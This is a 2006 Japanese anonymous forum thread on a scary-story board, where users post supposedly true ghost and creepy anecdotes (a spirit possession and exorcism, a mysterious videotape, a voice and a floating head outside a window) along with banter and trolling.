473 :本当にあった怖い名無し:2006/10/11(水) 12:36:56 ID:XMlycT2V0
>>471
専ブラなめるなコラ!w

474 :本当にあった怖い名無し:2006/10/11(水) 12:42:52 ID:ZH9Iqg3L0
>>472
晒せんて
駅周辺・朝市

475 :本当にあった怖い名無し:2006/10/11(水) 13:53:51 ID:r5heMtpA0
心霊話じゃないんだけどさ
本人は怖かった話

数年前、当時「ブレアウィッチ・プロジェクト」ってDVD流行ってさ。
観た人も多いと思うんだけど、中のシーンでテントの中にいる学生を
無数の子供の手がテントをバンバン叩いて襲うってのがあるのね。
あれちょっとトラウマでさ、森の中って怖え〜〜〜とか思ってたのね。

夏の早朝、長男と車で30分くらいの雑木林にカブトムシ採りに行ったんだ。
林道脇に車とめて、ちょっと斜度のある場所ってのもあったから、
車のエンジン止めて「オマエここでまっててな」って言って、子供
車の中に残して、1人で林に入ったのさ。

よく来る場所だし、もう明るくなってたから恐怖心とかまったく無かった
んだけど、少し上って尾根を半分下った辺りで、ノコギリクワガタを
2匹ゲットしたのよ。
つぶさないように両手に1匹づつ持って、とりあえず車に戻るべ、、って
思った直後、ズルって感じで足を滑らせたの。
今考えると、滑り落ちるほどの傾斜じゃないし、かえって転んでた方が
よかったと思うんだけど、足をふんばったら「グギッ」って腰の辺りで
なってさ、ギックリやっちゃったのよ。



476 :本当にあった怖い名無し:2006/10/11(水) 13:55:05 ID:r5heMtpA0
経験者ならわかるしょ?もう冷や汗ダラダラですよ。
でもクワガタ離したくないw
痛みで方向感覚おかしくなっちゃって、車の位置がわからない。
子供も心配だし、なぜか突然ブレア・・・が思考のなかに。
あせったよ。
迷ってたのはほんの15分くらいだと思うけど、あせりまくってた。

帰りも運転できないんじゃないかと思うくらい激痛で、それでも
なんとか帰宅したけど、カミさんには爆笑されたよ (´・ω・`)
お盆にクワガタは森に返したよ。

スレチガイな上に長文駄文でスマソ

477 :本当にあった怖い名無し:2006/10/11(水) 14:10:09 ID:BBMZDLaMO
>>476
腰は洒落にならんすね…
俺もヘルニア持ちだから分かるけど後遺症残ってないなら良かったですね
お気をつけて☆

478 :本当にあった怖い名無し:2006/10/11(水) 14:36:23 ID:YWECDnGEO
>>477
☆はやめたほうが…
>>476
腰はくせになりますから、気をつけてくださいね
僕は昔事故で打ったときの後遺症が未だにづます…駄目になってからだと本当に洒落になりませんから

479 :本当にあった怖い名無し:2006/10/11(水) 15:33:16 ID:6BmauNGJO
心霊ツアーの集団が行方不明 捜索2日目

http://travel2.2ch.net/test/read.cgi/kyoto/1152348786/

480 :本当にあった怖い名無し:2006/10/11(水) 15:37:07 ID:6R+XiIVT0
>>478
頭打った後遺症ですか?

481 :MU-100R@PC ◆aREMPBr7cs :2006/10/11(水) 15:38:12 ID:XCR7reEH0
>>479
ギコナビのお陰でそこに逝かなくても済むね。
釣れますか?

482 :本当にあった怖い名無し:2006/10/11(水) 15:41:37 ID:YWECDnGEO
>>480
なんで本スレまで来て荒らすかなぁ…

483 :本当にあった怖い名無し:2006/10/11(水) 16:40:01 ID:5m3KVwmm0
昨日の事なんだけど、緑の中を走り抜けていく
真っ赤なポルシェを見た。

484 :本当にあった怖い名無し:2006/10/11(水) 16:44:09 ID:6R+XiIVT0
>>483
俺も。偶然ってあるんだね。

485 :MU-100R@PC ◆aREMPBr7cs :2006/10/11(水) 16:46:26 ID:XCR7reEH0
>>483

一人旅なの
私気ままにハンドル切るの
交差点では隣の車がミラー擦ったと
怒鳴っているから
私もついつい大声になる
馬鹿にしないでよ
そっちのせいよ!
と・・・・人のせいにする事がオカルト

とでも言いたいのか?

486 :本当にあった怖い名無し:2006/10/11(水) 16:48:37 ID:5m3KVwmm0
>>485
その長いノリ突っ込みがオカルト

487 :本当にあった怖い名無し:2006/10/11(水) 17:45:11 ID:YWECDnGEO
荒らしはやめルンバ!

488 :本当にあった怖い名無し:2006/10/11(水) 17:50:40 ID:6R+XiIVT0
>>487
君のほうが荒らしてるようにみえルンバ!

489 :本当にあった怖い名無し:2006/10/11(水) 18:21:15 ID:YWECDnGEO
>>488
マジルンバ!?

490 :本当にあった怖い名無し:2006/10/11(水) 19:02:50 ID:NSTjKWrV0
はいはいはい!荒らしはここまで
ここからは俺が今年の夏友達の別荘で体験した怖い話を始めます

491 :本当にあった怖い名無し:2006/10/11(水) 19:37:44 ID:APPKyrDJ0
ハヨウ、ハジメンカイ!

492 :MU-100R@携帯 ◆aREMPBr7cs :2006/10/11(水) 19:41:57 ID:xPaS6vx0O
>>490
まだですか?

493 :本当にあった怖い名無し:2006/10/11(水) 19:45:18 ID:NpSdpVUdO
まぁ、マターリ
お待ちしましょう
    +  +
  + ∧_∧ +
  + (0゚・∀・) +
  + (0゚つ旦O +
   と_)_)
お茶ドウゾ!


494 :本当にあった怖い名無し:2006/10/11(水) 19:58:46 ID:YWECDnGEO
オマエラキヅケツラレテルコトニ

495 :本当にあった怖い名無し:2006/10/11(水) 20:05:11 ID:NSTjKWrV0
+   +
  ∧_∧  +
 (0゚・∀・)   ワクワクテカテカ
 (0゚∪ ∪ +
 と__)__) +


496 :MU-100R@携帯 ◆aREMPBr7cs :2006/10/11(水) 20:07:56 ID:xPaS6vx0O
>>494
釣りしてる人には大漁にして、ホコホコな気分で帰してあげるのが私の生活信条

497 :本当にあった怖い名無し:2006/10/11(水) 20:08:42 ID:134SnQvgO
あのさ、今朝電通大から飛び降り自殺があって、それに巻き込まれて重症を負った女子大生いるじゃん?

それに関してなんだけど

498 :MU-100R@携帯 ◆aREMPBr7cs :2006/10/11(水) 20:11:55 ID:xPaS6vx0O
>>497
    +  +
  + ∧_∧ +
  + (0゚・∀・) +
  + (0゚つ旦O +
   と_)_)


499 :本当にあった怖い名無し:2006/10/11(水) 20:30:18 ID:YWECDnGEO
ミラクルサンドイッチを食べてみたんだけど目から黒い粉が出てくるだけで何も起きないよ?

500 :本当にあった怖い名無し:2006/10/11(水) 20:45:54 ID:V/bFxOIN0
>>445
どうでもいいけど
ヘルパー資格ない奴に普通はそんなことはやらせない

501 :本当にあった怖い名無し:2006/10/11(水) 20:59:40 ID:/GHXLbkv0
>>500
特養で働いていたけど、ボランティアには普通、車椅子を
押させたり、食事介助くらいだなw


502 :本当にあった怖い名無し:2006/10/11(水) 21:14:57 ID:UXyr+IyzO
DQNな施設だとそのかぎりではないのかも

503 :本当にあった怖い名無し:2006/10/11(水) 21:21:04 ID:NSTjKWrV0
>>499
どういうこと?!
kwsk!!!

504 :本当にあった怖い名無し:2006/10/11(水) 21:26:43 ID:e7nGGDhI0
でもこわかった

505 :本当にあった怖い名無し:2006/10/11(水) 21:28:27 ID:asbKKgB60
ヤレヤレ┐(´Α`)┌コマッタネ

506 :本当にあった怖い名無し:2006/10/11(水) 21:28:29 ID:e7nGGDhI0
ごめんあげちゃった


507 :本当にあった怖い名無し:2006/10/11(水) 21:35:40 ID:YWECDnGEO
>>503
家にさ小太郎っていう犬がいるんだ

508 :本当にあった怖い名無し:2006/10/11(水) 21:44:34 ID:YWECDnGEO
本当のこと言うよ…実は俺…










アイカゴなんだテヘッペロチュババrara

509 :本当にあった怖い名無し:2006/10/11(水) 21:46:15 ID:YWECDnGEO
>>507
ナカーマ(^ε^)

510 :本当にあった怖い名無し:2006/10/11(水) 22:06:14 ID:NSTjKWrV0
アイカゴ撲滅運動実施中

511 :本当にあった怖い名無し:2006/10/11(水) 22:50:51 ID:NSTjKWrV0
「おい!起きろ!」
俺は必死に彼女を起こした…
彼女は死んでいたのだ…
それいらい夕日を見るのが怖くて仕方ありません。


512 :本当にあった怖い名無し:2006/10/11(水) 23:30:16 ID:YWECDnGEO
>>511
kwsk

513 :本当にあった怖い名無し:2006/10/11(水) 23:32:39 ID:yCprYea9O
遅くなりました、>>215です。時間あるので書きますね。


最近、Sと再会したキッカケは同じサークル内の後輩が、Sと同じ地元だとわかってからだった。
後輩に無理言って、先々週の土日を使ってSの地元に案内してもらった。
中学まで良くSと遊んだというその後輩はSの自宅も知っており、少々強引かと思ったが前々からSが気になってしょうがない俺はSの自宅を訪れた。

朗らかな感じで背の低い、活発そうなSの母親が出てきた。事情を説明すると驚いていたが、すぐにSを呼んでくれた。
玄関にSが出てきた。髪を坊主にしていた。
突然の訪問に目を丸くしていたが、「よぉ…」と苦笑いしながら罰の悪そうな声を出した。
本当に久しぶりにSの元気そうな姿を見て俺は泣きそうになった。


部屋に上げてもらい、色々と話しを聞くコトにした。妙に緊張してよそよそしい会話だったが、Sは次の様に答えてくれた。
(以下、長い話しなのでポイント毎に要約して書いていきます。)


514 :本当にあった怖い名無し:2006/10/11(水) 23:35:25 ID:yCprYea9O
>>続き
@あの夜何が起こったか

爆睡する自分の横でひたすら眠れなかったS。眠れなかったというかSは敢えて眠らなかった。朝まで絶対に気を緩めまいと固く心に誓ったらしい。
そして深夜、寒くなったSは布団を取りに押し入れを開けた。
そこにあの女がいた。
Sがリアクションを取る間も無く、その女はSに重なった。
そこからの意識は飛び飛びだったという。気づくと便器に向けて「ウゲェー!ゲェー!」吐いていて、「本能的に異物を吐き出そうとしたんかな?」と語っていた。
しかし出てくるのは血ばかり、「自分はここで死ぬかもしれない」と覚悟したらしい。もう「吐こう」という意識とは関係なく、口から血が溢れてくる。俺が背中叩いたり名前を呼び続けたのも覚えていないそうだ。

515 :本当にあった怖い名無し:2006/10/11(水) 23:40:22 ID:yCprYea9O
すんません>>514>>513の続きです

>>514続き
A何故突然退院したのか、連絡手段を途絶えさせたのか

病院の医師曰く「畑違い」とのコトらしかった。声帯はほぼ完全に治っており、尚も声が出ないのはSの意識問題、精神面での傷。つまり、ウチの管轄外ですよ。と宣告されたそうだ。
Sの母親はクリニックに通いつつの学業復帰を薦めたが、Sは退院後、大学を辞めて実家に帰ると訴えた。何と言われようが絶対に折れなかったらしい。
その後両親に迎えに来てもらい、Sは実家に帰った。「半分狂いかけとったなw、でもどうしても病院やクリニックで何とかなるとは思われんかった」
女は毎日夢に出てきた、以前には無かった夢遊病の癖もついていたそうだ。
状況が酷くなる前に神社か寺で祓ってもらい、田舎で静かに暮らそうと考えていたらしい。
連絡手段を途絶えさせたのには、ただ「心配させたくなかった」とだけ答えたが、俺はSが全てを忘れたかったんじゃないか、と考えている。

516 :本当にあった怖い名無し:2006/10/11(水) 23:47:30 ID:yCprYea9O
>>515続き

Bあの女はどうなったのか

実家に戻る前に両親に全てを打ち明けていたSは両親同伴の元、地元にある大きな寺を訪れた。
驚くことに、寺に着くなりSは住職により本堂に案内され、「ここで全てを打ち明けなさい。」と言われた。声の出せないSは紙とペンで全てを打ち明けようとした。しかし突然、途中でペンが止まった。
あれだけ意識がハッキリしている時に、しかも呼吸が出来ない程の金縛りにあったのは初めてだったという。突然Sが苦しみ出したので住職達は大急ぎでお祓いを始めたらしい。
しかし目の前が真っ暗になり、数人のバタバタという足音、お経や金属音を暫く聞いてプツリと意識を失ったらしい。
次に目を覚ますと寺の客間の布団の上で、住職と両親が側にいた。住職が話してくれた。

特に強い怨念を残した霊で、憑き方が普通ではなかった。内側から侵食しており、Sはもう少し遅ければ本当に危なかったとのコト。
住職は「中々出て行かないのでこんなモノを使いました」と木彫の仏さまを見せてきた。身代わりの効果があるらしく、簡素な作りの人形だったがSにはとても神々しく見えたという。



517 :本当にあった怖い名無し:2006/10/11(水) 23:49:50 ID:yCprYea9O
>>515続き

Bあの女はどうなったか その2

Sが声を失ったのにも意味があるらしかった。声には力があるらしく、霊が媒体を支配する際にその力を奪う、と言うのは良くあるコトらしい。言霊(コトダマ)と霊は密接に関係しているそうだ。

お祓いが済んでもまだ声を出せない様子のSを見て両親は心配したが、住職曰く「もう大丈夫。栄養をとって数日落ち着けば声も出るでしょう」とのコト。
実際一週間程で徐々に声は回復し、以前通りの生活を過ごせるようになったという。
その後しばらくしてSは派遣業者に勤め、無事に今まで過ごしてきたとのコト。



518 :本当にあった怖い名無し:2006/10/11(水) 23:53:51 ID:yCprYea9O
>>517>>516の続きです。しかまアゲちゃいましたすんません

>>517続き

以上>>154から長々と書いてきましたが、コレが自分の体験霊体験の全てです。Sはお祓いの後、あの女はおろか一度も霊を見ることがなく、霊感を無くしてしまった、と語っていました。身代わりの仏さまにそういう力ごと封印されたのでしょうか?
とにかく本当に危ない心霊スポットには遊び半分じゃなくても近づくもんじゃないってコトですね。
我々にそういう異界のモノをどうにかできる力なんてありゃしないんだと思い知らされましたよ。
長々と失礼しましたー。

519 :本当にあった怖い名無し:2006/10/11(水) 23:55:04 ID:NSTjKWrV0
>>512
ある日俺は目を覚ました。
隣には見知らぬ女が寝ていた。
昨日バーで知り合った女か?はっきりしないが昨夜関係があったことは事実だ。
「おい!起きろ!」
俺は必死に彼女を起こした・・・
返事がない。
俺は彼女の体をゆすって起こそうとした。
そのときハッとした。
ハッとしてグー。
彼女の体は氷の様に冷たくなっていたのだ。
俺はその場にしゃがみこんでしまった。
「し、死んでいる・・・」
俺はとりあえずリビングにいきセッタに日をつけた。
セッタ日。。。
セッ、夕日。。。
それいらい夕日を見るのが怖くて仕方ありません。
アイゴー!!!

520 :本当にあった怖い名無し:2006/10/11(水) 23:55:28 ID:5WAmIfb4O
リアルな話もおk?

521 :MU-100R@PC ◆aREMPBr7cs :2006/10/11(水) 23:58:20 ID:QHyPXBCA0
>>519
( ・_ゝ・)ツマンネ
おまけに最期の締めがキムチ臭くなってる。

522 :本当にあった怖い名無し:2006/10/12(木) 00:00:42 ID:D3tEmtv3O
>>520
それこそ読みたい。
長寿スレの最期に、花を手向けてやって欲しい。

523 :本当にあった怖い名無し:2006/10/12(木) 00:01:22 ID:NSTjKWrV0
>>522
まだはじまってもいねーよ


524 :本当にあった怖い名無し:2006/10/12(木) 00:03:50 ID:r8NUY05l0
>>518
乙カレー。


525 :本当にあった怖い名無し:2006/10/12(木) 00:20:10 ID:l+y+a//SO
これからは真面目な青年としてやっていきたいたいです。
fin

526 :1/2:2006/10/12(木) 00:23:24 ID:zm/KE0laO
リアルな話。
俺のバイト先の先輩の友達の友達(女)に起きた話


その人は大学生でアパートで1人暮らしをしていて
ある日ポストに一本のビデオテープが投函してあったらしい。
しかし誰が入れたか思い当たらないので、その人は不気味なので観ない事にした。
しかし捨てるのもなんなので捨てずに保管してたらしい。

そして数週間後に大学生女友達4人が家に遊びに来た。
そしてその時にビデオテープがポストに入れてあった事を話すと、
みんなで観ようという事になったので観ることにした。
全員は内容が全く分からないので、恐る恐るビデオを再生した。
内容は「呪いのビデオ的」でも、「怖い感じのビデオ」でも無かった。

527 :本当にあった怖い名無し:2006/10/12(木) 00:29:00 ID:zm/KE0laO
ただ気持ち悪い感じの中年男が、部屋の中で意味不明な踊りをしてるだけの内容。
その大学生の女の女友達は、意味不明な中年男と踊りに爆笑していた。
しかしその大学生の女がみんな笑ってる中で突然泣き出した。
女友達が「なにかあったの?」「大丈夫?」と声をかけると
その大学生の女は泣きながらこう答えた。
「だって…ウッ…グスッ…その踊ってる部屋…ウゥッ…この部屋だよ…」
なんとその踊ってる部屋は、その大学生の女の住んでいる部屋だったのだ。




これで終わり。
ちなみにその後警察呼んで中年男逮捕できたらしいです。

何故なら顔が丸出しだったから。

528 :本当にあった怖い名無し:2006/10/12(木) 00:35:24 ID:h9eniC5MO
(((((;゚д゚)))))ガクガクブルブルガクガクブルブル

529 :本当にあった怖い名無し:2006/10/12(木) 01:02:07 ID:l+y+a//SO
>>519
なかなかなかなか出来ない奴っぱね〜

530 :本当にあった怖い名無し:2006/10/12(木) 01:04:04 ID:PW8vPORTO
踊ってるだけで逮捕とはそれこそ恐怖だな。

不法侵入で踊ってたとかいうならしょうがないけど。

531 :本当にあった怖い名無し:2006/10/12(木) 01:05:04 ID:5mFBwDY40
突っ込みポイント有り。
リアル前提なので残念で賞。

532 :本当にあった怖い名無し:2006/10/12(木) 01:11:57 ID:dfNcnsi3O
不法侵入だったから捕まったんでしょ?

533 :本当にあった怖い名無し:2006/10/12(木) 01:12:11 ID:tdV/gV7kO
>>188
>>196
>>197
>>211
>>212
>>513-518
携帯からの長文乙カレー
興味深いし、面白かったよ

534 :本当にあった怖い名無し:2006/10/12(木) 01:12:56 ID:KZOJvwdg0
>>529
でもこれ元ネタはアイカゴの4行ぐらいの糞小説だお(; ^ω^)

535 :本当にあった怖い名無し:2006/10/12(木) 01:13:12 ID:04+jMZjlO
つか、このネタまとめにあった筈。

536 :本当にあった怖い名無し:2006/10/12(木) 01:35:10 ID:l+y+a//SO
>>534
ちゃんとコメント読めよ〜あと俺本人だから、お前低能だろ?
あれは誰かが書いたやつに適当に付けたした奴だよバ〜カハハハ

537 :本当にあった怖い名無し:2006/10/12(木) 01:56:24 ID:r8NUY05l0
久々にまとめ行って師匠シリーズ増えてたから全部読み直したんだけど
改めて 『失踪』 読んで思ったのは、師匠は憑かれたんでも狂ったんでもなく
みえなくなっちゃったんじゃないかなぁ、って。  どうでもいいな。ウニ来ねぇかな〜。

538 :本当にあった怖い名無し:2006/10/12(木) 02:11:09 ID:dWD/bJkLO
>>537
あんな怖くもない糞ラノベはスレ違いだ。
専門スレ行ってやれ。


539 :本当にあった怖い名無し:2006/10/12(木) 02:11:12 ID:/1cfaYB9O
と、と、突入だッ!

540 :本当にあった怖い名無し:2006/10/12(木) 02:13:39 ID:Vgz5tzfe0
師匠ドコイッチャッタンダロナ。

541 :本当にあった怖い名無し:2006/10/12(木) 02:21:27 ID:Vgz5tzfe0
オイ。みんなネチャタノ?

542 :本当にあった怖い名無し:2006/10/12(木) 02:38:17 ID:pLx8/Qcu0
>>541
おきてるお。

543 :本当にあった怖い名無し:2006/10/12(木) 02:41:48 ID:/1cfaYB9O
その話、ポイントはローソンじゃね?

544 :本当にあった怖い名無し:2006/10/12(木) 03:59:34 ID:Hm6mIdZdO
>>530
十分、不法侵入で立件できる。ましてや、ビデオを送り付ける行為も、脅迫やストーカー規制法に引っ掛かる。

545 :本当にあった怖い名無し:2006/10/12(木) 04:01:43 ID:tJ5xJhdD0
>>154-156
>>160
>>164
>>186
>>188
>>196-197
>>211-212
>>215
>>513-518

で全部かな。乙でした。
洒落怖にふさわしい久々の大作、よかったです。

>我々にそういう異界のモノをどうにかできる力なんてありゃしないんだと思い知らされましたよ。

いい台詞。

546 :本当にあった怖い名無し:2006/10/12(木) 04:26:27 ID:PW8vPORTO
>544
部屋が同じとあるだけで小物やら家具が同じと書いてるわけじゃないから、
前の住人が撮ったとか考えられないか?と思ったってだけ。
同じ部屋っても状況が違うわけだし。

547 :本当にあった怖い名無し:2006/10/12(木) 05:44:32 ID:mLgfS19wO
前の住人が何の為に送ってくるん? 普通に読んで不法侵入て思うし
お前もイカレとんな

548 :本当にあった怖い名無し:2006/10/12(木) 09:34:31 ID:vJCo3UKG0
>>545を全部読んだ人、3行であらすじをお願いしまつ。

>>546
その感想は正しい。
同じ部屋と判断した理由がないから弱いよね。

549 :本当にあった怖い名無し:2006/10/12(木) 10:01:29 ID:l+y+a//SO
マツナガ屋の酒田さんの話、昨日酒田んとこのマツナガを買いに行ったら売り切れていました。
そもそもマツナガとは何なのか?
僕は疑問に思いマツナガを探す旅にでました。
マツナガとは古来に伝わる美味しい肉の乗った丼ものだという噂をききいれました。
でも町の人は何処かしら不安げな表情です。
「どうしたん?」ときくと、町の人は
「もう期間は終わったのよ…」という。
俺は???だった。この時代に丼ものの期間なんてあるのか?と思った。少し、ほんの少しだけど、腹がたちました。
帰ってテレビをつけると、テレビではそのことについて詳しくやっていた。
なるほどな〜ってことは来月あたりまた発売するかもしれんな…。
腹のたつのも治まり、妄想でしこり(古来)一眠りした。

550 :本当にあった怖い名無し:2006/10/12(木) 10:02:26 ID:6W0j9rMV0
【さくら】死ぬ死ぬ詐欺【NHK】@大規模OFF*03
http://off3.2ch.net/test/read.cgi/offmatrix/1160307794/l50


551 :本当にあった怖い名無し:2006/10/12(木) 10:51:13 ID:MrnhyK+80
アイカゴが起きるまではしずかだニャ〜♪

552 :本当にあった怖い名無し:2006/10/12(木) 11:08:42 ID:drVszBDeO
これは自分が厨房の時の体験談の1つ

厨房の頃、古い社宅に住んでいた
家族は、オレと母と姉。父とは別居していた。別居というか複雑な関係。週に一度くらいは社宅に来る。
ある日、いつもと変わりのない週末の夜…。オレは自分の部屋で、寝っころがって漫画を読んでいた。
自分の部屋といっても、姉と共用。
姉はそのとき風呂に入ってた。
母は襖越しの隣の部屋でテレビを見てたんだと思う。

そんな時、不意に
『おーい…』
…誰かに呼ばれた気がして、オレは身を起こした。
「…気のせい?…テレビか?」
と軽く思い、また寝っころがろうとした時
『おーい』
今度はハッキリ聞こえた。親父が来たのかと思った。玄関から呼んでるのかと思った。
でも、親父の声とは違う様な気がした。妙に曇った声。

553 :本当にあった怖い名無し:2006/10/12(木) 11:09:22 ID:l+y+a//SO
>>551
>>551
>>551
>>551

554 :本当にあった怖い名無し:2006/10/12(木) 11:12:13 ID:l+y+a//SO
せ〜のはい!LANLANLALALANLANLAN〜せい!(`▽´)






>>551

555 :本当にあった怖い名無し:2006/10/12(木) 11:20:42 ID:l+y+a//SO
>>552
まだまだまだまだまだまだまだまだまだまだまだまだまだまだまだまだまだまだまだまだまだまだ?

556 :本当にあった怖い名無し:2006/10/12(木) 11:21:39 ID:MrnhyK+80
ん?どうしたニャ?

557 :本当にあった怖い名無し:2006/10/12(木) 11:28:16 ID:MrnhyK+80
だまだまだまだまだまだまだまだまだまだまだまだまだまだまだまだまだまだまだまだま

558 :本当にあった怖い名無し:2006/10/12(木) 11:28:39 ID:drVszBDeO
>>552の続き

オレは固まったまま、様子をうかがってみた。
ボロ社宅なので玄関に誰か来れば、物音が聞こえるハズ…。
しかし何も聞こえてこない。聞こえるのは隣の部屋のテレビの音。
不信に思ったオレは玄関を確認しようと思い、襖に手をかけた。そのとき

『おーい』
…!また聞こえた。オレの後ろから。
振り返ってみるが誰もいない。
目の先にはカーテンの閉まった窓があるだけ。
(外から呼んでる…?)
ちなみにここは2階。外から大声で叫べば、窓が閉まっていても聞こえない事はない。
窓に近づく。色々な解釈が頭を巡る。
(友達?こんな遅くに?)
(やっぱり親父か?玄関の鍵閉まってたか?)
窓まで約1メートルくらい。ここまでは恐怖とかの感情はなかった。日常的な軽い疑問程度。

『おーい』

オレは固まった。
聞こえる。窓のすぐ外から。曇った声。そう、まるでガラスに口を押しつけているかのような曇った声。
若干チビる。

続く

思っていたより長文になりそうです。スイマセン…

559 :本当にあった怖い名無し:2006/10/12(木) 11:42:29 ID:l+y+a//SO
長文になりそうな出だしかよ…

560 :本当にあった怖い名無し:2006/10/12(木) 11:42:56 ID:bfesghrwO
今時携帯でもメモ位付いてるだろーに。
メル作成→保存でもよかろーに。

561 :本当にあった怖い名無し:2006/10/12(木) 11:45:09 ID:kG15yTJaO
さんざん書いてから投下しろって言われてるだろ

562 :本当にあった怖い名無し:2006/10/12(木) 11:52:40 ID:l+y+a//SO
↑そ、そうだよー…

563 :本当にあった怖い名無し:2006/10/12(木) 11:53:28 ID:FWfxfUac0
先日コンパした時に来た、ほっしゃん似の女に昨日告白されました。
首から下はナイスバディだったのでOKしてしまいました。

564 :本当にあった怖い名無し:2006/10/12(木) 11:55:54 ID:l+y+a//SO
>>563
荒らしですか?
そうですか
わかりました

565 :本当にあった怖い名無し:2006/10/12(木) 12:10:25 ID:drVszBDeO
>>558の続き

ここから恐怖にかわった。
ゆっくりと窓からはなれるオレ。というかゆっくりとしか動けない。ホントはダッシュで母のいる部屋に飛び込みたかった。

『おーい』

勘弁してくれ
声の振動でガラスが震えてるのがわかった。
カーテン越しの窓の方を凝視しながら、隣の部屋への襖に後ろ手を掛け、ゆっくりと開ける。
泣きそうになりながら母に助けを求めようとした………が、母の姿がない。テレビからはバラエティー番組の笑い声が聞こえる。

猛ダッシュで台所へ。そして塩を鷲掴み。塩を撒き散らしながら窓の部屋へ。そしてそのままの勢いでカーテンめがけて塩の塊を投げつけた。
その頃の精一杯の除霊方法。

…しばしの沈黙。固まるオレ。
(あれ?やっつけた!?すげーなオレ)
とか一瞬得意気になった。
何はともあれ確認しなければ部屋にいられたものじゃない。
修学旅行で買った木刀片手に、カーテンに近づき一気に開ける!
バッ!!と何かが横に隠れた。オレは声にならない叫びをあげたと思う
(………頭!?)
隠れたのは頭っぽいもの。思い返せば頭で間違いない。顔はよく分からないが、目や鼻や口のようなものは一瞬見えた。
ここで2度目のチビり。もはやチビるというレベルは超えていたかもしれない。

続く

566 :本当にあった怖い名無し:2006/10/12(木) 12:18:42 ID:l+y+a//SO
ピンポンダッシュ祭はどこに行けばやってますかーーーーーー?

567 :本当にあった怖い名無し:2006/10/12(木) 12:20:30 ID:drVszBDeO
>>561
いや、本当に申し訳ないです。
メモから写せるの今初めて知りました…orz
携帯の機能使いこなせてなかったです。
メモってから再度投下します…

568 :本当にあった怖い名無し:2006/10/12(木) 12:25:39 ID:l+y+a//SO
>>567
まぁ分かればいいよ…別に怒ってないからね!

569 :本当にあった怖い名無し:2006/10/12(木) 12:26:49 ID:MrnhyK+80
>>568
怒ってるよ!

570 :本当にあった怖い名無し:2006/10/12(木) 12:30:45 ID:l+y+a//SO
>>569
怒ってないよ!!

571 :本当にあった怖い名無し:2006/10/12(木) 13:02:53 ID:MrnhyK+80
ゎーぃ!!

572 :本当にあった怖い名無し:2006/10/12(木) 13:16:31 ID:l+y+a//SO
ちゃーぃールルル〜rarara

573 :本当にあった怖い名無し:2006/10/12(木) 13:53:11 ID:MrnhyK+80
ぉーぃ!ヶヶヶ・・・

574 :本当にあった怖い名無し:2006/10/12(木) 13:54:26 ID:Ju9KXvCB0
>>567
楽しみにしてるよ!

575 :本当にあった怖い名無し:2006/10/12(木) 13:56:21 ID:/1cfaYB9O
つまり、他人の家のキッチンで何やっていたか・てことだ。

576 :本当にあった怖い名無し:2006/10/12(木) 14:15:16 ID:NwwrLXFt0
>>563その表現だと「首から上はナイスバディ」という女もいるのかという気がするんだが。
単にナイスバディと書けばいいんじゃないか。なんか「頭痛が痛い」みたいだ。
あと、せっかくだからほっしゃんをイメージ検索してみた。
たしかにこういう顔の女いるな。

577 :本当にあった怖い名無し:2006/10/12(木) 14:23:00 ID:drVszBDeO
>>565の続き

窓の外は安全の為か鉄の柵がついている。
一度試したことがあるが、外から一階の柵によじ登って二階のこの場所まで来ることは可能だった。
泥棒か、のぞきか…
人であって欲しいと心から願った。
が、ふと思った。
隠れるとしたら下に身を伏せるなり、飛び降りるなりしないだろうか。
…柵は窓の前にしかついていない。
横は………無理だ…。捕まる場所がない。
そう考えながらも既に木刀の先で窓を数センチ開けてしまっていた。
ワザと大きい音をさせながら、一気に窓を全開にし、木刀を持った手だけ外にだしてがむしゃらに木刀を振り回した。
手応えなし。
腕を引っ込める。
塩のせいで足の裏が痛い。

続く

578 :揚足取造:2006/10/12(木) 14:24:20 ID:l+y+a//SO
ここらでひとつ、揚げ足をとってもよろしいでしょうか?

579 :本当にあった怖い名無し:2006/10/12(木) 14:24:35 ID:drVszBDeO
>>577の続き

木刀には何も当たらなかった。オレはそれが確認できただけで少しホッとした。
が、それ以上の確認の仕方はしたくなかった。
いずれにしても追っ払った。そう思った。

窓を半分ほど閉めたとき、外に何か見えた。手が止まる。
この窓から外を見下ろすと、右斜め前に駐輪場が見える。これまたボロい。
その駐輪場はコンクリートでできた長方形の倉庫と一体になっている。その側面。
頭が生えてた。90度横になって。鼻から下半分はコンクリートに潜っている形。
暗い街灯に照らされていて男だか女だかもわからなかったけど、確実にオレを見てた。妙に自然な感じがした。
(見ちゃったな…)
と思った。それ以外何を考えてたか忘れてしまったが。

「どうしたん?」
心臓飛び出る思いで振り返ると母がいた。

続く

580 :本当にあった怖い名無し:2006/10/12(木) 14:27:00 ID:drVszBDeO
>>579の続き

母にビビりながらもまた外を見る。
まだ居る。
「何こぼしたん?コレ…」
いいから!ちょっ…!外見てみ!チャリ置き場みてみ!!と、ジェスチャーで伝えるオレ。
母は眉にシワ寄せながら窓を全開にして外を覗いた。
しばらくキョロキョロした後、固まる母。
「なっ!?見えるだろ!?」
返事もせずに静かに窓を閉め、カーテンを閉める母。
「いるんだねぇ、ああいうの…」
間違いない。居るんだ。幻覚じゃない。母により確信した。
思いついた様な顔して母「あんたさぁ、さっき外行った?」
…は?不意の質問。
「何それ。どういうこと?」
母「さっき、あんたの声で玄関から『行ってきます』って聞こえたんよ。いつの間に玄関いったのかと思って見に行ったんだけど…靴あるし、変だなぁと思ってこっちの部屋来てみたん」
そしてオレに声をかけたらしい。

ちょっと続く

581 :本当にあった怖い名無し:2006/10/12(木) 14:28:30 ID:drVszBDeO
>>580の続き

その日は二度と外を確認する事なく、母もオレも寝た。ちなみに姉には内緒ということで。ビビりなんで。

次の日、元気なガキんちょ達の遊ぶ声で目が覚めた。…窓が開いていた。母が開けたのだろう。

外へ確認しにでる。階段の踊り場から駐輪場を見るが、…何もなかった。結局何もかにも謎だらけ


この一件により、オレと母は霊の類を信じざるを得なくなった。

今はもう社宅は取り壊されてしまったので、何も確認しようがないんですが。


長文のお詫びと、読んで下さった方への感謝を致します。

では、また後日

582 :超アイカゴ:2006/10/12(木) 14:29:15 ID:l+y+a//SO
しっ!誰かくる!!

583 :本当にあった怖い名無し:2006/10/12(木) 14:36:49 ID:MrnhyK+80
>>582
ん?どうしたニャ?

584 :本当にあった怖い名無し:2006/10/12(木) 14:40:09 ID:Ju9KXvCB0
>>581
乙!

しかしなんか、霊というより妖怪を思わせる不気味さだね

585 :かんた:2006/10/12(木) 14:45:18 ID:iKLPdRAy0
お〜い たぬ吉さん見てますか?
あの場では言えなかったですけどあんたもう手遅れだよ。

あの人形もうあんたの体の一部化してたからね。
もはや払うのは無理なんじゃないかな。

たぬ吉さんが悪いんだよ?調子に乗ってるから。
みんなからウザがられてるの気付かなかった?

